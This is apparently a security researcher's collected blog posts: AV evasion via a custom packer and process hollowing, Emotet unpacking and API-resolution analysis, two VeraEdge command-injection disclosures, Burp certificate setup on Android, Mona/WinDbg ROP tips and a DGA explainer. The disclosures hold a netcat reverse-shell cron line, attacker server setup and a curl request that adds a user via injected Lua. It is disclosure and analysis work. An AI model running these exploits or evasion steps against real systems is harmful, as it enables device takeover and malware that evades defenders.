Packing and Process Injection to Evade Windows Defender

I have spent the last couple of weeks exploring packers and process injection from an attacker’s perspective in Windows environments. Paired together, packing and process injection have proven effective at evading antivirus software, specifically Windows Defender. In this post I will discuss the concepts behind packing and process injection as they relate to antivirus evasion.


A packer is a software program that accepts a binary executable file and transforms it into an encrypted version. The encrypted file decrypts itself at runtime and executes the original program. Signature-based antivirus software works by detecting known patterns in malicious files and blocking their execution. It can be evaded by encrypting the malicious file as it is represented on disk, giving it a unique signature that is not cataloged in the antivirus signature database.

To understand the basics of packing Portable Executable files, a general understanding of the PE format and PE loader is required.

The packer I have developed has two components. The first component is a crypter.  The crypter takes a PE file as input, encrypts the file and encodes it in a way that is suitable for the packer to decrypt.  This is the payload.  The second component is the packer source.  The output from the crypter is embedded in the .rsrc section of the packer PE file once compiled.   The packer source acts as a decrypter and PE loader for the encrypted payload.  


The crypter encrypts the input PE file using AES-256 in ECB mode. This was an arbitrary decision that will likely be revisited in a rewrite in the coming weeks (more on that later). The encrypted file is Base64 encoded and saved to a text file for input into the packer build process.

When the packer is executed, the Base64 encoded file is located in the .rsrc section and loaded into memory. Once in memory, the file is Base64 decoded and decrypted using a hard-coded key.  This is the reason I plan on revisiting the encryption scheme.  The plan is to change this implementation detail in a future rewrite such that a key is chosen in a limited key space so that it can be brute forced at startup from the packer.  Brute forcing the key at startup will allow the packer to decrypt the payload without the need for a hard-coded key.  A hard-coded key makes static analysis and potentially antivirus detection more feasible.

Once the file has been decrypted, it is handed off to a PE loader to begin execution.


The packer is written in C++ and makes use of both documented and undocumented Windows APIs to load the PE in memory at runtime and execute the embedded payload.

The PE loader makes use of important structures to load the PE into memory, fix up the import address table, and rebase the image if needed.  


The PIMAGE_DOS_HEADER is used to validate the PE in addition to acting as a reference to the base of the image.


The PIMAGE_NT_HEADERS structure contains a four-byte signature identifying the file as a PE image. Again, this is used to validate the PE in addition to walking the structure to the IMAGE_OPTIONAL_HEADER and other addresses of importance.


The IMAGE_OPTIONAL_HEADER points to the image base and entry point address.  Additionally, we have access to the size of the image allowing us to allocate memory via VirtualAllocEx for the payload.


The PIMAGE_SECTION_HEADER provides access to the address and sizes of the different PE sections.  Each section is copied into a new address space for execution.
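The header fields described above can also be inspected offline, which is handy when checking what a loader would see in a given file. The following is a minimal read-only sketch in Python, not the packer's C++ code; the function name parse_pe_headers and the returned dictionary layout are assumptions made for illustration, while the field offsets follow the published PE format.

```python
import struct


def parse_pe_headers(data: bytes) -> dict:
    """Read the DOS, NT, optional, and section header fields of a raw PE file."""
    # IMAGE_DOS_HEADER: e_magic must be "MZ"; e_lfanew (offset 0x3C) locates the NT headers.
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)

    # IMAGE_NT_HEADERS begins with the four-byte signature "PE\0\0".
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")

    # IMAGE_FILE_HEADER (20 bytes) follows the signature.
    _machine, num_sections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4
    )

    # IMAGE_OPTIONAL_HEADER: ImageBase sits at a different offset in PE32 and PE32+.
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    if magic == 0x10B:    # PE32
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:  # PE32+
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional header magic")
    (size_of_image,) = struct.unpack_from("<I", data, opt + 56)

    # IMAGE_SECTION_HEADER entries (40 bytes each) follow the optional header.
    sections = []
    first = opt + opt_size
    for i in range(num_sections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, first + 40 * i
        )
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "raw_pointer": raw_ptr,
        })

    return {
        "image_base": image_base,
        "entry_point_rva": entry_rva,
        "size_of_image": size_of_image,
        "sections": sections,
    }
```

Calling parse_pe_headers(open(path, "rb").read()) on a file returns the image base, entry point RVA, image size, and the section table in one dictionary.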

Once memory is allocated for the image, the packer copies over the image headers and each of the corresponding image sections. After that, the image is rebased if it was not written to the expected region of memory. This involves looping over the BASE_RELOCATION_TABLE and adjusting each relocation block, because the addresses patched by the relocation entries are relative to the image base, which has changed.

If we were to execute the code now it would fail.  We would need to adjust the import address table by loading the required libraries using LoadLibraryA and using GetProcAddress to set the expected function addresses for the in-memory import address table.  I’m not going to go into this in detail.  My experience with this approach is that the payload is quickly discovered by the behavior analysis of Windows Defender.  To get around this issue I opted to use a process injection technique to further disguise malicious activity.

Process Injection

Instead of executing a malicious payload in the context of the packer, we can instead inject code into a host program.  In essence, process injection is the act of running foreign code within the address space of another process.  This improves stealth and, in my experience, helps avoid some behavior analysis executed by antivirus on running code.

Process Hollowing

Process hollowing is one of many different types of process injection techniques.  With process hollowing, code is injected into a target program by unmapping the legitimate code from memory and overwriting the memory space with malicious code.

To execute process hollowing, a target process is created in a suspended state. NtUnmapViewOfSection is used to unmap a region of memory from the virtual address space of the target process. From there, memory is allocated at that region using VirtualAllocEx. The payload’s image headers and sections are copied into that region of memory. As mentioned previously, the image is rebased if it was not written to the expected region of memory. This involves looping over the BASE_RELOCATION_TABLE and adjusting each relocation block, because the addresses patched by the relocation entries are relative to the image base, which has changed.

After the packer has finished writing the payload to the memory of the target process and rebasing the image, it calls SetThreadContext to point the thread at the new entry point address. Finally, ResumeThread is called to continue execution of the target process, transferring control to the malicious code.


When paired together, both packing and process injection have proven effective in evading antivirus software.  In my testing, commonly detected PE files were executed using the above techniques without being picked up by antivirus.  I plan to release some code using some of the techniques discussed in this post over the coming weeks.  This post will be updated when the time comes.

Emotet File Drop While Debugging

In doing some dynamic analysis on the latest Emotet samples, I was running into an issue getting the persistent copy of the malware to execute. In its normal flow of execution, Emotet will drop itself into C:\Users\<username>\AppData\Local and make a call to CreateProcessW to continue execution. I was unable to break on CreateProcessW. Instead, the code would terminate.

It turns out Emotet was making a call to SHFileOperationW to do the file drop. SHFileOperationW takes a pointer to a structure named _SHFILEOPSTRUCTW (the wide-character counterpart of _SHFILEOPSTRUCTA).

typedef struct _SHFILEOPSTRUCTW {
  HWND         hwnd;
  UINT         wFunc;
  PCZZWSTR     pFrom;
  PCZZWSTR     pTo;
  FILEOP_FLAGS fFlags;
  BOOL         fAnyOperationsAborted;
  LPVOID       hNameMappings;
  PCWSTR       lpszProgressTitle;
} SHFILEOPSTRUCTW, *LPSHFILEOPSTRUCTW;

Here is the structure in memory.

As you can see, the wFunc member is set to 01, or FO_MOVE. The result was C0000043 (STATUS_SHARING_VIOLATION): my debugger held a handle on the file, which prevented the move from occurring. I changed the value to 02, or FO_COPY, to copy the file instead. With this change the code continued execution as expected.

How Emotet Resolves APIs

If you take a look at an unpacked Emotet sample, something will certainly stick out to you. The sample will have few to no imports. Yet the malware is clearly making heavy use of the Windows API to achieve its objectives. So how is it doing this? It is making use of a well-known shellcoding technique to dynamically resolve APIs at runtime without the use of strings.

Emotet locates the DLL name from the Process Environment Block. The malware searches for the desired module name and then locates its image base. From the image base of the located module, it is able to walk the export table, locating function pointers for its own import table. On 32-bit Windows, the FS register points to the Thread Environment Block, or TEB. Offset 0x30 of the TEB contains a pointer to the Process Environment Block, or PEB. From there the malware walks the structure to _PEB_LDR_DATA, which contains the head of a doubly-linked list called InMemoryOrderModuleList. The entries in this list contain BaseDllName and DllBase. Once the PE header of the module is located from DllBase, the PE structure is walked to find the export table. Emotet then loops over the exported names to find the API function it is searching for.

Let’s take a look at this in action. The sample I am looking at is 0b96754a84bc2c01e4e8d64a534c03b5636fb6e958f7c381f9c27e646466cd32.

sub_403640 starts off by grabbing a reference to the TEB and then grabbing a pointer to the PEB at offset 0x30. From there, a pointer to the _PEB_LDR_DATA structure is saved off along with the module hash that was stored in ecx prior to the function call.

The code then loops over the BaseDllName entries, hashing each one and comparing it to the module hash. If the hashed BaseDllName matches the hash that was passed in, the DllBase is moved into eax prior to returning from the function.

The next function to look at is sub_4037C0, which locates the specific API in the selected module. Two parameters are moved into registers for this function call: edx contains the API hash and ecx contains the module address that was just resolved. The function starts by getting the offset of the PE header. Next, the RVA of the IMAGE_DIRECTORY_ENTRY_EXPORT is located. From there, the table of exported function names is located, which is an RVA from the base of the image. The function then loops over the exported functions, calculating a hash of each function name as it progresses. When a hash matches, the function pointer is located by getting the RVA of the ordinals table and finding the specific ordinal of the function. The RVA of the function pointer table is then located and indexed by that ordinal to obtain the RVA of the function. The RVA is converted to a virtual address before being stored.
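When analyzing hashed imports like this, a common approach is to precompute the hash of every export name in the DLLs of interest and look the constants up in that table. The sketch below illustrates the idea. The post does not identify Emotet's hashing routine, so ror13_hash (the rotate-right-13 additive hash familiar from classic shellcode) is only a stand-in, and the names ror13_hash and build_lookup are hypothetical; swap in the routine recovered from the sample.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Stand-in hash (ROR-13 additive). NOT claimed to be Emotet's algorithm."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


def build_lookup(export_names, hash_fn=ror13_hash) -> dict:
    """Map hash value -> export name so constants seen in the disassembly can be resolved."""
    return {hash_fn(name): name for name in export_names}


if __name__ == "__main__":
    # In practice the names would come from the export table of the relevant DLLs.
    table = build_lookup(["CreateProcessW", "VirtualAlloc", "LoadLibraryA"])
    for value, name in sorted(table.items()):
        print(f"{value:#010x} {name}")
```

With the real hash function plugged in, each constant passed in edx can be looked up in the table to recover the API name.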

The two functions sub_403640 (GetModuleAddress) and sub_4037C0 (GetAPIAddress) are paired together throughout the code. Once Emotet has resolved the API in a given module, parameters are pushed onto the stack before the call eax instruction.

Unpacking Emotet

In this post I take a look at unpacking Emotet to discover hard coded command and control servers.  The MD5 for the sample I’m looking at is 8db38c7f70214ee08e166cde8b9163c6.

This sample of Emotet uses a customized packer.  Instead of trying to reverse the algorithm to unpack the next stage, we can use dynamic analysis.  I’ll let the malware do the unpacking for me and grab the next stage out of memory.  The process will need to allocate memory for the next stage, so it’s a good assumption that we will see a call to VirtualAlloc.  Open up the sample in x32dbg and set a breakpoint on VirtualAlloc.  When the breakpoint is hit, we can note the parameters that were passed to the function.

LPVOID VirtualAlloc(
  LPVOID lpAddress,        // 0x0
  SIZE_T dwSize,           // 0xc000
  DWORD  flAllocationType, // 0x3000 i.e. MEM_COMMIT | MEM_RESERVE
  DWORD  flProtect         // 0x4 i.e. PAGE_READWRITE
);

As you can see, the sample lets the system determine where to allocate the memory (lpAddress is 0) and requests read/write permissions. After the call to VirtualAlloc, the eax register will contain the base address of the allocated region. I followed that address in the dump window to keep an eye on it. After letting the code run to the next breakpoint, I can see the memory has been populated. Next, I jump to the memory map and dump the memory to a file.
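Decoding the flag values by hand gets tedious when the breakpoint is hit many times. A small helper along these lines can translate them; the constant values are the documented Windows ones, while the helper name decode_flags and the choice of which constants to include are assumptions for this sketch.

```python
# Subset of the documented VirtualAlloc allocation types and page protections.
ALLOCATION_TYPES = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
}

PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}


def decode_flags(value: int, table: dict) -> str:
    """Return the names of the known bits set in value; unknown bits are shown in hex."""
    names = []
    known = 0
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            known |= bit
    leftover = value & ~known
    if leftover:
        names.append(hex(leftover))
    return " | ".join(names) if names else "0"


if __name__ == "__main__":
    print(decode_flags(0x3000, ALLOCATION_TYPES))
    print(decode_flags(0x4, PAGE_PROTECTIONS))
```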

Opening the dump in a hex editor displays the following.

The file clearly contains a PE file, but there is some extra code at the beginning of the file. I’m unclear as to what this extra code is at this time; I may come back to look at it later. To move things along, I looked for the MZ magic number and trimmed everything that preceded it.
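The trimming step can be scripted instead of done by hand in a hex editor. The sketch below looks for an MZ magic number and only accepts it when e_lfanew points at a valid PE signature, which avoids cutting at a stray "MZ" inside the leading bytes. The function name carve_pe is hypothetical, and the sketch keeps everything from the header to the end of the dump rather than computing the exact image size.

```python
import struct


def carve_pe(dump: bytes) -> bytes:
    """Return the dump starting at the first MZ header that has a valid PE signature."""
    pos = dump.find(b"MZ")
    while pos != -1:
        # The DOS header is 0x40 bytes; e_lfanew lives at offset 0x3C inside it.
        if pos + 0x40 <= len(dump):
            (e_lfanew,) = struct.unpack_from("<I", dump, pos + 0x3C)
            sig = pos + e_lfanew
            if dump[sig:sig + 4] == b"PE\x00\x00":
                return dump[pos:]
        pos = dump.find(b"MZ", pos + 1)
    raise ValueError("no PE image found in dump")
```

Writing the result of carve_pe(open("dump.bin", "rb").read()) to a new file gives an image that can be opened in a disassembler; dump.bin is a placeholder file name.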

Opening the file in IDA just to take a peek I noticed that there were zero imports.  Jumping to sub_403530 I noticed some signs of dynamically creating an import table.  Looking at some of the instructions I can see that it is grabbing a pointer to the process environment block.  From there it appears to be walking the structure to locate function pointers for its own import table. There is certainly more to research here, but I’ll save that for another post.

After unpacking, we can see the list of C2 servers is hard coded in the binary.  This information gets written to a buffer in the .data section of the code.  If we are looking to grab the IOCs from the sample, we want to let the malware run and write the C2 servers to the buffer and examine the memory.  In the following screenshot we can see the first IP address and port.

The list contains a series of IP addresses and ports. In the highlighted entry, the first four bytes are the IP address, followed by two bytes for the port. The next two bytes can be ignored. I extracted the following C2 servers from the sample.
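Given that layout (four bytes of IP address, two bytes of port, two ignored bytes), extracting the list from a dumped buffer can be automated. The sketch below is illustrative only: the name parse_c2_list is hypothetical, and the byte order of both fields and the all-zero terminator are assumptions that should be checked against the bytes in the debugger. The sample addresses in the demo are documentation ranges, not values from the sample.

```python
import ipaddress
import struct


def parse_c2_list(blob: bytes, reverse_ip: bool = False) -> list:
    """Parse 8-byte records: 4-byte IP, 2-byte port, 2 bytes ignored.

    Assumptions: the port is little-endian, the IP bytes are in display order
    unless reverse_ip is set, and an all-zero IP marks the end of the list.
    """
    servers = []
    usable = len(blob) - len(blob) % 8
    for offset in range(0, usable, 8):
        ip_raw, port = struct.unpack_from("<4sH", blob, offset)
        if ip_raw == b"\x00\x00\x00\x00":
            break
        if reverse_ip:
            ip_raw = ip_raw[::-1]
        servers.append((str(ipaddress.IPv4Address(ip_raw)), port))
    return servers


if __name__ == "__main__":
    demo = (
        bytes([192, 0, 2, 10]) + struct.pack("<H", 8080) + b"\x00\x00"
        + bytes([198, 51, 100, 7]) + struct.pack("<H", 443) + b"\x00\x00"
        + b"\x00" * 8
    )
    for ip, port in parse_c2_list(demo):
        print(f"{ip}:{port}")
```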

Vera Edge Home Controller – Remote Shell via Unauthenticated Command Injection

Note: This vulnerability has been assigned CVE-2019-15498.

This post outlines a vulnerability in the VeraEdge Home Controller running firmware version 1.7.4452. The VeraEdge allows you to connect with and control a variety of smart home devices from different vendors. Device settings and states can be orchestrated using scenes and rooms to control a smart home. The devices can be accessed by the home controller using Z-Wave or Wi-Fi. The controller can be accessed remotely via mobile and web applications. The VeraEdge controller also has a local web server for access on the LAN.

The hardware consists of a 600MHz MIPS SoC, 128MB NAND flash, and 128MB of DDR2 memory. The controller has support for Wi-Fi, Z-Wave, and USB in addition to ethernet.

A command injection vulnerability was discovered in the /cgi-bin/cmh/ endpoint. The Vera Edge Home Controller hosts many Haserl scripts in the /www/cgi-bin/cmh directory. The file is vulnerable to limited command injection. Furthermore, the endpoint does not have any CSRF protection, authentication, or authorization requirements. Given the lack of endpoint protection, it is possible to exploit this vulnerability over the Internet through a phishing email or a drive-by visit to a web site.

Content-Type: image/jpeg

#Copyright (C) 2009 MiOS, Ltd., a Hong Kong Corporation
#           1 - 702 - 4879770 / 866 - 966 - casa
#This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License.
#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

if [[ -n "$FORM_ip" ]]; then
    if [[ -n "$FORM_username" ]]; then
        if [[ -n "$FORM_password" ]]; then
            curl -k -s -u $FORM_username:$FORM_password --connect-timeout 3 --max-time 5 "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"
        else
            curl -k -s -u $FORM_username --connect-timeout 3 --max-time 5 "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"
        fi
    else
        curl -k -s "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"
    fi
fi

From the above script, we can see that the script takes the following input parameters: ip, username, and password. Depending on what values are present, a cURL command is constructed using the appropriate command line arguments. Haserl is supposed to protect against command injection. The following characters appeared to be ignored or stripped from processing by Haserl even though the variable isn’t enclosed in quotes: “; ? & |”. With this limitation, it was found that additional command line arguments can still be injected into the command and supplied to cURL. The protections just limit an attacker from terminating the cURL command early or concatenating input to execute arbitrary shell commands.

Since the attacker controls the IP address from which cURL will retrieve a file, a remote server can be set up in the following manner to host a malicious file. The exploit requires the use of a cron job to execute a netcat callback command for retrieving a remote shell. Set up a cron file hosted on the remote server for the cURL command to retrieve. Execute the following commands on a remotely accessible Linux server.

mkdir www
cd www
touch index.html
echo * * * * * nc -e /bin/ash {ip address of remote server} 8000 > index.html
python3 -m http.server 80

The following screenshot shows the remote server setup and listening for requests.


Next, the attacker can craft a malicious URL to be sent to the victim.{ip address of remote server}/index.html%20–output%20/etc/crontabs/nobody

The previous URL will cause the cURL command to execute a GET request to the IP address of the remote server, retrieving the index.html file and writing it to /etc/crontabs/nobody. The --output /etc/crontabs/nobody argument is injected into the cURL command that the script executes. The name of the cron file must match a valid user; the nobody user was selected in this case. The cron job runs every minute, executing nc -e /bin/ash {remote server ip} 8000. This command executes /bin/ash with stdin, stdout, and stderr directed to the network descriptor. With a listener on the other end, the attacker will have a remote shell over port 8000.

The attacker will set up a listener using the nc -l -p 8000 -vvv command to listen on port 8000 for incoming connections.



Tech Note: Installing Burp Certificate on Android 9

Note: this technique does not work on Android 10. At this point, I am unsure of how to make /system writable to copy the certificate into the trusted store.

After setting up a proxy and configuring a device, normally you can navigate to http://burp and download the certificate for installation. This did not work for me when running Android 9.

To install the certificate on an Android 7 or above device I had to export the certificate from Burp in DER format.


Once the certificate is exported it must be converted from DER to PEM format.

openssl x509 -inform DER -in burp.der -out burp.pem

Rename the certificate using the subject hash.

openssl x509 -inform PEM -subject_hash_old -in burp.pem |head -1

mv burp.pem <output_from_previous_command>.0

Copy the file <subject_hash>.0 into /sdcard on the android device.

./adb push /path/to/file/<subject_hash>.0 /sdcard/

Remount /system as read/write. This requires a rooted Android device or emulator.

./adb shell su -c "mount -o rw,remount,rw /"

Open a shell on the Android device.

./adb shell

Once the shell is loaded, move the file into the trusted certificate store, set correct permissions, and reboot the device.

cp /sdcard/<subject_hash>.0 /system/etc/security/cacerts/

chmod 644 /system/etc/security/cacerts/<subject_hash>.0


Vera Edge Home Controller – LuaUPnP Unauthenticated Command Injection

Note: This vulnerability has been assigned CVE-2019-13598.

A command injection vulnerability was discovered in the /port_3480/data_request endpoint.  The VeraEdge has support for Lua scripting allowing developers to extend the functionality of the device.  Lua scripts submitted in the Test Luup code (Lua) form in the web interface are handled by the /port_3480/data_request endpoint which forwards requests to a C++ program called LuaUPnP.  LuaUPnP does not whitelist input allowing for the use of insecure API calls.  Furthermore, the endpoint does not have any authentication or authorization requirements.

The following image is an extract of the /etc/lighthttpd.conf displaying the proxy rule which forwards requests to the /port_3480 endpoint to localhost:3480.


The following image displays output from the netstat command showing the LuaUPnP process listening on all interfaces.


The following image displays output from the ps aux command showing that LuaUPnP runs as root.


Exploiting LuaUPnP via command injection will likely grant the same root level privileges.

Requests are handled by the JobHandler_LuaUPnP::HandleActionRequest function. This function determines the type of request being made; if the action parameter is equal to RunLua, it calls the JobHandler_LuaUPnP::RunLua function. JobHandler_LuaUPnP::RunLua does some setup and sanity checking before delegating the execution of the Lua script to the JobHandler_LuaUPnP::RunCode function. One such sanity check is whether unsafe Lua scripting is allowed. In my testing of different device security settings, this block of code never appeared to be executed.

if (*(char *)(*(int *)(this + 0x244) + 0x20f) == '\0') {
    piVar2 = (int *)GetInstance();
    (**(code **)(*piVar2 + 0x10))(piVar2,2,"JobHandler_LuaUPnP::RunLua unsafe disabled");
    __dest = (char *)(*(int *)param_1 + 8);
    __nptr = "No unsafe lua allowed";
}
else {
    // Additional checks before running Lua code…
}



The following cURL command demonstrates exploitation of this vulnerability by creating a new user, giving the attacker the ability to log in to the device via SSH, which is enabled by default.

curl -i -s -k  -X $'POST' \
    -H $'Host:' -H $'Content-Length: 252' \
    --data-binary $'id=lu_action&serviceId=urn:micasaverde-com:serviceId:HomeAutomationGateway1&action=RunLua&Code=os.execute(%22adduser%20-h%20%2Froot%20-s%20%2Fbin%2Fash%20testuser%22)%3B%0Aos.execute(%22echo%20-e%20%5C%22test%5Cntest%5C%22%20%7C%20passwd%20testuser%22)' \

Using Mona with WinDbg

Load pykd.pyd

.load pykd.pyd

Verify Mona is working by viewing usage information

!py mona

Search for modules that are not ASLR-enabled or rebased

!py mona noaslr

Search through memory to find ROP gadgets in the kernel32.dll module

!py mona rop -m kernel32.dll

We can search multiple modules at once to find ROP gadgets for better results

!py mona rop -m "kernel32.dll,server.exe,ws2_32.dll,RPCRT4.dll" -cpb "\x00\x0a\x0d"

Search for gadgets using wildcards. The following example will search kernel32.dll for pop any 32 bit register, pop any 32 bit register, and then a return

!py mona findwild -m kernel32.dll -s "pop r32 # pop r32 # ret"

WinDbg tips for writing shellcode

I’ve had to search for instructions using WinDbg when doing a stack pivot. The following example will search for jmp edx (ff e2):

s 0 L?7EEEEEEE ff e2

Once you find a list of addresses that can be used for your pivot, verify you have the correct instruction by disassembling at that address:

0:000> u 7706da75
7706da75 ffe2 jmp edx
7706da77 48 dec eax
7706da78 8b05ca160300 mov eax,dword ptr ds:[316CAh]
7706da7e 48 dec eax
7706da7f 85c0 test eax,eax
7706da81 7419 je 7706da9c
7706da83 807c246000 cmp byte ptr [esp+60h],0
7706da88 7412 je 7706da9c

Once you have found an address to use for your stack pivot double check the memory protections at that address using !vprot:

0:000> !vprot 7706da75
BaseAddress: 7706d000
AllocationBase: 77050000
AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY
RegionSize: 00018000
State: 00001000 MEM_COMMIT
Protect: 00000020 PAGE_EXECUTE_READ
Type: 01000000 MEM_IMAGE

Explaining DGAs

A DGA is a Domain Generation Algorithm. These algorithms provide malware with new domains when connecting back to a C2 server. Both the C2 server and the client need to implement the same DGA so that they stay in sync and can communicate at any given time.

DGAs are necessary to avoid blacklisting, which hinders the operation of the malware. Without a DGA, a new version of the malware would need to be deployed whenever the domain is discovered and blocked. A well-written DGA is hard to predict and switches domains at a regular interval to avoid blacklisting, keeping the C2 communication up and running. The result of a DGA is an AGD, or algorithmically generated domain. The constant changing of domains is often referred to as Domain Fluxing.

Finding DGAs in malware is often the combination of reverse engineering and dynamic analysis.  Reverse engineering will allow you to determine seed values and top level domains used to generate the domains.  The goal is to reverse engineer the algorithm to predetermine domains for blacklisting.  Alternately, you can run the malware and log network traffic reviewing the generated domains, and attempt to reverse engineer the algorithm which generated them.
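To make the idea of predetermining domains concrete, here is a toy date-seeded generator. It is not taken from any malware family: the function name generate_domains, the seed string, the use of MD5, and the reserved .example TLD are all assumptions chosen for illustration. Once a real algorithm and its seed have been recovered through reverse engineering, the same pattern lets a defender compute the domains for upcoming dates and add them to a blocklist ahead of time.

```python
import hashlib
from datetime import date, timedelta


def generate_domains(seed: str, day: date, count: int = 5, tld: str = ".example") -> list:
    """Toy DGA: derive `count` pseudo-random labels from a shared seed and a date."""
    domains = []
    for index in range(count):
        material = f"{seed}-{day.isoformat()}-{index}".encode("ascii")
        digest = hashlib.md5(material).hexdigest()
        # Map the first 12 hex digits onto the letters a..p to form the label.
        label = "".join(chr(ord("a") + int(ch, 16)) for ch in digest[:12])
        domains.append(label + tld)
    return domains


if __name__ == "__main__":
    # Pre-compute the next three days of domains for a blocklist.
    start = date(2020, 1, 1)
    for offset in range(3):
        day = start + timedelta(days=offset)
        print(day.isoformat(), generate_domains("demo-seed", day, count=2))
```

Because the output depends only on the seed and the date, the client and the server (or a defender holding the recovered seed) arrive at the same list independently.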

In summary, DGAs provide malware authors a method to avoid detection and blacklisting of their C2 channel. Reverse engineering the DGA provides a method for defenders to protect their networks from malicious activity. DGA authors will continue to think of new and clever ways of generating domains for C2 connectivity. Potential methods include seeding the algorithms based on trending topics on Twitter, stock market prices, or even the current value of bitcoin. The potential methods are only limited by one’s imagination.